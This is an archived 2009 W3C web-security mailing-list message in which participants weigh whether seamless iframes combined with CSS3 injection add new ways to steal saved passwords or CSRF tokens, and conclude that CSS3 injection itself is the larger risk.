- From: Adam Barth <w3c@adambarth.com>
- Date: Sat, 5 Dec 2009 10:17:35 -0800
- To: "sird@rckc.at" <sird@rckc.at>
- Cc: Collin Jackson <w3c@collinjackson.com>, public-web-security@w3.org
I think Collin's point about the CSRF tokens is that they tend to be on every page anyway. Adam On Sat, Dec 5, 2009 at 10:16 AM, sird@rckc.at <sird@rckc.at> wrote: > collin. this attack allows you to steal nonces, making csrf protections less > efficient. seamless iframes make this work on ALL the domain/origin.. > > greetings. > > On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote: > > A few thoughts: > > * The password stealing attack can already be accomplished using the > iframe to create a login page and prompting the user to type their > password. It's not necessary to use CSS3 or seamless. > * If the password manager is used, CSS3 + seamless lets you steal the > password without user interaction. > * However, if you can inject arbitrary CSS3 and a seamless iframe into > a page, there's a good chance you can inject a password field, so this > password manager attack doesn't require seamless, just CSS3. > * Many webapps include a CSRF token in every page as a hidden form > field. If the page that allows CSS3 injection includes such a token, > you don't need seamless iframes to steal the token. > > It seems like CSS3 is adding a lot of attack surface, sites may need > to block arbitrary CSS3 injection regardless of seamless. That is > unfortunate since browser vendors have been removing expression, > -moz-binding, and other features that make CSS injection dangerous. > > On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote: > I > see. The issue is that t...
Received on Saturday, 5 December 2009 18:18:28 UTC